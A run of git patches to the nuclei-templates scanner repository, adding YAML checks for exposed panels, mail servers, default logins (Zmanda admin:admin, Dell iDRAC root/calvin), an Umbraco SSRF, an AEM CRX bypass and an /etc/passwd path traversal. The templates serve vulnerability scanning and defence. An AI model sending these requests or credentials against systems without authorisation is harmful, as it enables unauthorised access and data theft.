Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 26 Jun 2021 19:42:11 +0530 Subject: [PATCH 0089/4083] more strict matcher --- misconfiguration/shell-history.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/misconfiguration/shell-history.yaml b/misconfiguration/shell-history.yaml index 50fe75707c..e523c7c17c 100644 --- a/misconfiguration/shell-history.yaml +++ b/misconfiguration/shell-history.yaml @@ -39,6 +39,7 @@ requests: - type: word words: - - "" + - "text/html" + part: all negative: true From 3f902db47ef7c1a3d9a402170bd4f7858600653e Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 28 Jun 2021 10:35:29 +0200 Subject: [PATCH 0090/4083] Add template to detect open jenkins api --- exposed-panels/jenkins-api-panel.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/jenkins-api-panel.yaml diff --git a/exposed-panels/jenkins-api-panel.yaml b/exposed-panels/jenkins-api-panel.yaml new file mode 100644 index 0000000000..e99421b55c --- /dev/null +++ b/exposed-panels/jenkins-api-panel.yaml @@ -0,0 +1,23 @@ +id: jenkins-api-panel + +info: + name: Jenkins API Instance Detection Template + author: righettod + severity: info + description: Try to detect the presence of a Jenkins API instance via the API default XML endpoint + tags: panel,api,jenkins + +requests: + - method: GET + path: + - "{{BaseURL}}/api/xml" + + matchers-condition: and + matchers: + - type: word + words: + - "hudson.model.Hudson" + + - type: status + status: + - 200 \ No newline at end of file From 94ee677aba77b30e896f9ff5b298480a2bdc80b0 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 16:43:01 +0530 Subject: [PATCH 0091/4083] Added more templates --- exposed-panels/calendarix-panel.yaml | 22 ++++++++++++++++++++++ network/expn-mail-detect.yaml | 22 ++++++++++++++++++++++ network/starttls-mail-detect.yaml | 22 ++++++++++++++++++++++ 3 files changed, 66 insertions(+) create mode 100644 exposed-panels/calendarix-panel.yaml create mode 100644 network/expn-mail-detect.yaml create mode 100644 network/starttls-mail-detect.yaml diff --git a/exposed-panels/calendarix-panel.yaml b/exposed-panels/calendarix-panel.yaml new file mode 100644 index 0000000000..0098e446c3 --- /dev/null +++ b/exposed-panels/calendarix-panel.yaml @@ -0,0 +1,22 @@ +id: calendarix-panel + +info: + name: Calendarix login detect + author: r3dg33k + severity: info + tags: panel,calendarix + +requests: + - method: GET + path: + - '{{BaseURL}}/calendarix/admin/cal_login.php' + - '{{BaseURL}}/calendar/admin/cal_login.php' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'Calendarix Admin Login' diff --git a/network/expn-mail-detect.yaml b/network/expn-mail-detect.yaml new file mode 100644 index 0000000000..adc6613c1f --- /dev/null +++ b/network/expn-mail-detect.yaml @@ -0,0 +1,22 @@ +id: expn-mail-detect + +info: + name: EXPN Mail Server Detect + author: r3dg33k + severity: info + tags: mail,expn,network + +network: + - inputs: + - data: "65686c6f20636865636b746c730a" + type: hex + read-size: 2048 + + host: + - "{{Hostname}}" + - "{{Hostname}}:25" + + matchers: + - type: word + words: + - "250-EXPN" \ No newline at end of file diff --git a/network/starttls-mail-detect.yaml b/network/starttls-mail-detect.yaml new file mode 100644 index 0000000000..c337a57aba --- /dev/null +++ b/network/starttls-mail-detect.yaml @@ -0,0 +1,22 @@ +id: starttls-mail-detect + +info: + name: STARTTLS Mail Server Detect + author: r3dg33k + severity: info + tags: mail,starttls,network + +network: + - inputs: + - data: "65686c6f20636865636b746c730a" + type: hex + read-size: 2048 + + host: + - "{{Hostname}}" + - "{{Hostname}}:25" + + matchers: + - type: word + words: + - "250-STARTTLS" From 8b08cf5aac3f9845f98560333f222ceeda10a7ef Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 16:45:02 +0530 Subject: [PATCH 0092/4083] Update calendarix-panel.yaml --- exposed-panels/calendarix-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/calendarix-panel.yaml b/exposed-panels/calendarix-panel.yaml index 0098e446c3..a8581f03b6 100644 --- a/exposed-panels/calendarix-panel.yaml +++ b/exposed-panels/calendarix-panel.yaml @@ -11,7 +11,7 @@ requests: path: - '{{BaseURL}}/calendarix/admin/cal_login.php' - '{{BaseURL}}/calendar/admin/cal_login.php' - + matchers-condition: and matchers: - type: status From c9427524757eeac8127531ce505159ebe9c593ac Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 28 Jun 2021 11:19:42 +0000 Subject: [PATCH 0093/4083] Auto Update README [Mon Jun 28 11:19:42 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index af4554ff8f..46eaae6a02 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 362 | vulnerabilities | 198 | exposed-panels | 155 | +| cves | 362 | vulnerabilities | 198 | exposed-panels | 156 | | takeovers | 68 | exposures | 107 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 25 | | default-logins | 31 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**119 directories, 1348 files**. +**119 directories, 1351 files**. From bce647b4419cd7ccf032b465f8d28c77bcb949e1 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 17:14:03 +0530 Subject: [PATCH 0094/4083] Added CVE-2015-8813 --- cves/2015/CVE-2015-8813.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cves/2015/CVE-2015-8813.yaml diff --git a/cves/2015/CVE-2015-8813.yaml b/cves/2015/CVE-2015-8813.yaml new file mode 100644 index 0000000000..0d085c296d --- /dev/null +++ b/cves/2015/CVE-2015-8813.yaml @@ -0,0 +1,22 @@ +id: CVE-2015-8813 + +info: + name: Umbraco SSRF Vulnerability in Feedproxy.aspx + author: emadshanab + severity: high + description: A Server Side Request Forgery (SSRF) vulnerability in Umbraco in Feedproxy.aspx allows attackers to send arbitrary HTTP GET requests.Once you change the URL to the http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index, you able to access the localhost application of the server + refrense: | + - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 + tags: cve,cve2015,ssrf,oob + +requests: + - method: GET + path: + - "{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}" + + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" \ No newline at end of file From 66f52b4236aa69c0cae320a2e721d86a74a36c8c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 28 Jun 2021 11:59:51 +0000 Subject: [PATCH 0095/4083] Auto Update README [Mon Jun 28 11:59:51 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 46eaae6a02..bbc027871b 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 362 | vulnerabilities | 198 | exposed-panels | 156 | +| cves | 363 | vulnerabilities | 198 | exposed-panels | 156 | | takeovers | 68 | exposures | 107 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 25 | | default-logins | 31 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**119 directories, 1351 files**. +**119 directories, 1352 files**. From 4e0cb9380054bb47e7aa45daf7435ba3786fd753 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 17:34:13 +0530 Subject: [PATCH 0096/4083] Adding livezilla-login-panel --- exposed-panels/livezilla-login-panel.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/livezilla-login-panel.yaml diff --git a/exposed-panels/livezilla-login-panel.yaml b/exposed-panels/livezilla-login-panel.yaml new file mode 100644 index 0000000000..751d564c77 --- /dev/null +++ b/exposed-panels/livezilla-login-panel.yaml @@ -0,0 +1,22 @@ +id: livezilla-login-panel + +info: + name: Livezilla login detect + author: __Fazal + severity: info + tags: panel,livezilla + +requests: + - method: GET + path: + - '{{BaseURL}}/mobile/index.php' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'LiveZilla' \ No newline at end of file From 2c88238e41a747b98510640e2b7fdba57e51e36a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 17:37:58 +0530 Subject: [PATCH 0097/4083] Added sitecore-login-panel --- exposed-panels/sitecore-login-panel.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/sitecore-login-panel.yaml diff --git a/exposed-panels/sitecore-login-panel.yaml b/exposed-panels/sitecore-login-panel.yaml new file mode 100644 index 0000000000..c950960da9 --- /dev/null +++ b/exposed-panels/sitecore-login-panel.yaml @@ -0,0 +1,24 @@ +id: sitecore-login-panel + +info: + name: Sitecore Login Panel + author: b4uh0lz + severity: info + tags: panel,sitecore + +requests: + - method: GET + path: + - "{{BaseURL}}/sitecore/admin/login.aspx" + + redirects: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Sitecore Login" + part: body \ No newline at end of file From 87b93c6d9fa2b6fdb06c61c4384f65fea1500e3b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 17:38:21 +0530 Subject: [PATCH 0098/4083] Update sitecore-login-panel.yaml --- exposed-panels/sitecore-login-panel.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposed-panels/sitecore-login-panel.yaml b/exposed-panels/sitecore-login-panel.yaml index c950960da9..ebb1fe6566 100644 --- a/exposed-panels/sitecore-login-panel.yaml +++ b/exposed-panels/sitecore-login-panel.yaml @@ -10,8 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/sitecore/admin/login.aspx" - - redirects: true + matchers-condition: and matchers: - type: status From 287efe295ce88e7563b28055b44308a6aaf4144e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 17:44:46 +0530 Subject: [PATCH 0099/4083] Added addeventlistener-detect --- miscellaneous/addeventlistener-detect.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 miscellaneous/addeventlistener-detect.yaml diff --git a/miscellaneous/addeventlistener-detect.yaml b/miscellaneous/addeventlistener-detect.yaml new file mode 100644 index 0000000000..0b4b57ca9d --- /dev/null +++ b/miscellaneous/addeventlistener-detect.yaml @@ -0,0 +1,19 @@ +id: addeventlistener-detect + +info: + name: AddEventlistener detection + author: yavolo + severity: info + tags: xss + reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - 'window.addEventListener(' + part: body \ No newline at end of file From d43fb47b33121cf5d2762b5d7bf723cf8cdee81c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 17:46:50 +0530 Subject: [PATCH 0100/4083] spaces --- exposed-panels/livezilla-login-panel.yaml | 2 +- exposed-panels/sitecore-login-panel.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/livezilla-login-panel.yaml b/exposed-panels/livezilla-login-panel.yaml index 751d564c77..4f5e04c1cd 100644 --- a/exposed-panels/livezilla-login-panel.yaml +++ b/exposed-panels/livezilla-login-panel.yaml @@ -10,7 +10,7 @@ requests: - method: GET path: - '{{BaseURL}}/mobile/index.php' - + matchers-condition: and matchers: - type: status diff --git a/exposed-panels/sitecore-login-panel.yaml b/exposed-panels/sitecore-login-panel.yaml index ebb1fe6566..64258de71b 100644 --- a/exposed-panels/sitecore-login-panel.yaml +++ b/exposed-panels/sitecore-login-panel.yaml @@ -10,7 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/sitecore/admin/login.aspx" - + matchers-condition: and matchers: - type: status From 71d038deba46acd7ee84b0a3278c48b39689ed9b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 28 Jun 2021 12:18:31 +0000 Subject: [PATCH 0101/4083] Auto Update README [Mon Jun 28 12:18:31 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index bbc027871b..fd36b0ad17 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 363 | vulnerabilities | 198 | exposed-panels | 156 | +| cves | 363 | vulnerabilities | 198 | exposed-panels | 158 | | takeovers | 68 | exposures | 107 | technologies | 107 | -| misconfiguration | 71 | workflows | 32 | miscellaneous | 25 | +| misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 31 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**119 directories, 1352 files**. +**119 directories, 1355 files**. From 990bcc59d868b457290226c8afeee5ec3ab8ca5c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 18:11:50 +0530 Subject: [PATCH 0102/4083] Added Zmanda default login --- .../zmanda/zmanda-default-credential.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 default-logins/zmanda/zmanda-default-credential.yaml diff --git a/default-logins/zmanda/zmanda-default-credential.yaml b/default-logins/zmanda/zmanda-default-credential.yaml new file mode 100644 index 0000000000..b0c1146975 --- /dev/null +++ b/default-logins/zmanda/zmanda-default-credential.yaml @@ -0,0 +1,29 @@ +id: zmanda-default-credential + +info: + name: Zmanda Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:admin on Zmanda application. + reference: https://www.zmanda.com + tags: zmanda,default-login + +requests: + - method: POST + path: + - '{{BaseURL}}/ZMC_Admin_Login' + headers: + Content-Type: application/x-www-form-urlencoded + Cookie: zmc_cookies_enabled=true + + body: login=AEE&last_page=&username=admin&password=admin&submit=Login&JS_SWITCH=JS_ON + + matchers-condition: and + matchers: + - type: word + words: + - "ZMC - Backup Set Management" + + - type: status + status: + - 200 \ No newline at end of file From 65dbde4913c592d86a6f3c8184d53c6465a9545a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 18:12:15 +0530 Subject: [PATCH 0103/4083] Update zmanda-default-credential.yaml --- default-logins/zmanda/zmanda-default-credential.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/zmanda/zmanda-default-credential.yaml b/default-logins/zmanda/zmanda-default-credential.yaml index b0c1146975..f8a52ed7c7 100644 --- a/default-logins/zmanda/zmanda-default-credential.yaml +++ b/default-logins/zmanda/zmanda-default-credential.yaml @@ -26,4 +26,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From f8faa8536b4626c931d592a4ed3e70a7adb17b06 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 28 Jun 2021 12:43:41 +0000 Subject: [PATCH 0104/4083] Auto Update README [Mon Jun 28 12:43:41 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index fd36b0ad17..ee90de4877 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 363 | vulnerabilities | 198 | exposed-panels | 158 | | takeovers | 68 | exposures | 107 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | -| default-logins | 31 | file | 42 | dns | 10 | +| default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**119 directories, 1355 files**. +**120 directories, 1356 files**. From 050c1f54a012a69d7f6b2a4bdfa953bc821a5e74 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 20:02:56 +0530 Subject: [PATCH 0105/4083] Fixed login template --- .../dell/dell-idrac9-default-login.yaml | 28 ++++++++++--------- 1 file changed, 15 insertions(+), 13 deletions(-) diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml index 71253cf738..6e90d9208e 100644 --- a/default-logins/dell/dell-idrac9-default-login.yaml +++ b/default-logins/dell/dell-idrac9-default-login.yaml @@ -1,22 +1,24 @@ id: dell-idrac9-default-login + info: - name: Dell iDRAC9 Default login - author: kophjager007 + name: DELL iDRAC9 Default Login + author: kophjager007,milo2012 severity: high tags: dell,idrac,default-login requests: - - method: POST - cookie-reuse: true - path: - - "{{BaseURL}}/sysmgmt/2015/bmc/session" - body: "user=root&password=calvin" - headers: - Accept: "application/json, text/plain, */*" - user: "root" - password: "calvin" - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 - Referer: "{{BaseURL}}/login.html" + - raw: + - | + POST /sysmgmt/2015/bmc/session HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 + Accept: application/json, text/plain, */* + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + User: "root" + Password: "calvin" + Content-Length: 0 + Connection: close matchers-condition: and matchers: From 102d0b21b4bb61b544772cdfa34fa35767d9923d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 20:07:22 +0530 Subject: [PATCH 0106/4083] Removing duplicate template --- exposures/configs/redmine-db-config.yaml | 27 ------------------------ 1 file changed, 27 deletions(-) delete mode 100644 exposures/configs/redmine-db-config.yaml diff --git a/exposures/configs/redmine-db-config.yaml b/exposures/configs/redmine-db-config.yaml deleted file mode 100644 index 9d22cc3961..0000000000 --- a/exposures/configs/redmine-db-config.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: redmine-db-config -info: - name: Detect Redmine Database Configuration - author: geeknik - description: Redmine is a flexible project management web application written using Ruby on Rails framework - https://redmine.org/projects/redmine - severity: medium - tags: config,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/config/database.yml" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'adapter:' - - 'database:' - - 'host:' - - 'production:' - condition: and - - - type: status - status: - - 200 \ No newline at end of file From a9dd2aa94f591a0ce961fc449990f6ac74eb921c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 28 Jun 2021 14:37:48 +0000 Subject: [PATCH 0107/4083] Auto Update README [Mon Jun 28 14:37:48 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ee90de4877..4881439d43 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 363 | vulnerabilities | 198 | exposed-panels | 158 | -| takeovers | 68 | exposures | 107 | technologies | 107 | +| takeovers | 68 | exposures | 106 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1356 files**. +**120 directories, 1355 files**. From 91b673ad17f460e9a87dc6efa5c0377116c5e472 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 28 Jun 2021 20:20:58 +0530 Subject: [PATCH 0108/4083] Create aem-crx-bypass.yaml --- misconfiguration/aem/aem-crx-bypass.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 misconfiguration/aem/aem-crx-bypass.yaml diff --git a/misconfiguration/aem/aem-crx-bypass.yaml b/misconfiguration/aem/aem-crx-bypass.yaml new file mode 100644 index 0000000000..67ab69b627 --- /dev/null +++ b/misconfiguration/aem/aem-crx-bypass.yaml @@ -0,0 +1,22 @@ +id: aem-crx-bypass + +info: + author: dhiyaneshDK + name: AEM CRX Bypass + severity: critical + reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ + tags: aem + +requests: + - raw: + - | + GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 + Referer: {{BaseURL}} + Connection: close + Accept-Encoding: gzip, deflate + matchers: + - type: word + word: + - "results:" From e53b26228386b590413b3d6542eb9f94c82e22ee Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 28 Jun 2021 20:23:11 +0530 Subject: [PATCH 0109/4083] Update aem-crx-bypass.yaml --- misconfiguration/aem/aem-crx-bypass.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/aem/aem-crx-bypass.yaml b/misconfiguration/aem/aem-crx-bypass.yaml index 67ab69b627..369820359c 100644 --- a/misconfiguration/aem/aem-crx-bypass.yaml +++ b/misconfiguration/aem/aem-crx-bypass.yaml @@ -1,6 +1,6 @@ id: aem-crx-bypass -info: +info: author: dhiyaneshDK name: AEM CRX Bypass severity: critical From eaa5d7600fb59fb894a75ee88b59a64932ea77d1 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 20:44:24 +0530 Subject: [PATCH 0110/4083] Added more strict matchers --- misconfiguration/aem/aem-crx-bypass.yaml | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/misconfiguration/aem/aem-crx-bypass.yaml b/misconfiguration/aem/aem-crx-bypass.yaml index 369820359c..a3216943b3 100644 --- a/misconfiguration/aem/aem-crx-bypass.yaml +++ b/misconfiguration/aem/aem-crx-bypass.yaml @@ -16,7 +16,23 @@ requests: Referer: {{BaseURL}} Connection: close Accept-Encoding: gzip, deflate + + matchers-condition: and matchers: - type: word + part: body word: - - "results:" + - '"results:"' + - '"path:"' + - '"pid":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + From e8ffd4ea066d5fc4386be00136da35e879dd1ed6 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 20:45:41 +0530 Subject: [PATCH 0111/4083] Update aem-crx-bypass.yaml --- misconfiguration/aem/aem-crx-bypass.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/misconfiguration/aem/aem-crx-bypass.yaml b/misconfiguration/aem/aem-crx-bypass.yaml index a3216943b3..4e6a8e4bb2 100644 --- a/misconfiguration/aem/aem-crx-bypass.yaml +++ b/misconfiguration/aem/aem-crx-bypass.yaml @@ -34,5 +34,4 @@ requests: - type: status status: - - 200 - + - 200 \ No newline at end of file From ca0483c4c95e808ccd14b567f53b7a4bfc164aad Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 28 Jun 2021 15:18:57 +0000 Subject: [PATCH 0112/4083] Auto Update README [Mon Jun 28 15:18:57 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 4881439d43..f064c06abb 100644 --- a/README.md +++ b/README.md @@ -44,7 +44,7 @@ An overview of the nuclei template directory including number of templates assoc | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1355 files**. +**120 directories, 1356 files**. From 2fddcb265db703bf8c07b3df11f6f14c8b84c055 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 20:54:44 +0530 Subject: [PATCH 0113/4083] Added sprintful-takeover --- takeovers/sprintful-takeover.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 takeovers/sprintful-takeover.yaml diff --git a/takeovers/sprintful-takeover.yaml b/takeovers/sprintful-takeover.yaml new file mode 100644 index 0000000000..d9b0c807af --- /dev/null +++ b/takeovers/sprintful-takeover.yaml @@ -0,0 +1,29 @@ +id: sprintful-takeover + +info: + name: Sprintful Takeover + author: Mhdsamx + severity: high + tags: takeover,sprintful + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'The user account associated with this calendar has been deactivated.' + - 'Please contact the owner of this calendar directly in order to book a meeting.' + - 'This domain name does not have a default page configured.' + condition: or + + - type: word + words: + - "Sprintful" \ No newline at end of file From 4538e18675782d226903040045142bfb38243d57 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 20:57:18 +0530 Subject: [PATCH 0114/4083] Update sprintful-takeover.yaml --- takeovers/sprintful-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/sprintful-takeover.yaml b/takeovers/sprintful-takeover.yaml index d9b0c807af..791e26095d 100644 --- a/takeovers/sprintful-takeover.yaml +++ b/takeovers/sprintful-takeover.yaml @@ -10,7 +10,7 @@ requests: - method: GET path: - '{{BaseURL}}' - + matchers-condition: and matchers: - type: status From ca45f3f206b4c1e12d7365d5d2b5c1869cefdcee Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 28 Jun 2021 15:37:48 +0000 Subject: [PATCH 0115/4083] Auto Update README [Mon Jun 28 15:37:48 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index f064c06abb..55e6bd83bd 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 363 | vulnerabilities | 198 | exposed-panels | 158 | +| cves | 363 | vulnerabilities | 198 | exposed-panels | 159 | | takeovers | 68 | exposures | 106 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1356 files**. +**120 directories, 1357 files**. From b97811a1437550cf04880cf4e32ad6dc4a40c118 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 21:43:04 +0530 Subject: [PATCH 0116/4083] Update CVE-2021-3223.yaml --- cves/2021/CVE-2021-3223.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2021/CVE-2021-3223.yaml b/cves/2021/CVE-2021-3223.yaml index 6974cdba27..229cfc06fb 100644 --- a/cves/2021/CVE-2021-3223.yaml +++ b/cves/2021/CVE-2021-3223.yaml @@ -15,7 +15,6 @@ requests: path: - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' - matchers-condition: and matchers: - type: regex regex: From 6babd9f63c78fa55ae15790b0dae9938808ebd00 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 28 Jun 2021 16:14:22 +0000 Subject: [PATCH 0117/4083] Auto Update README [Mon Jun 28 16:14:21 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 55e6bd83bd..01ecfa20d8 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 363 | vulnerabilities | 198 | exposed-panels | 159 | +| cves | 364 | vulnerabilities | 198 | exposed-panels | 159 | | takeovers | 68 | exposures | 106 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1357 files**. +**120 directories, 1358 files**. From 89f661a4f53ea6d90b4de77a0b866fd12a707cc8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 28 Jun 2021 16:15:00 +0000 Subject: [PATCH 0118/4083] Auto Update README [Mon Jun 28 16:15:00 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 01ecfa20d8..729a4685c2 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | 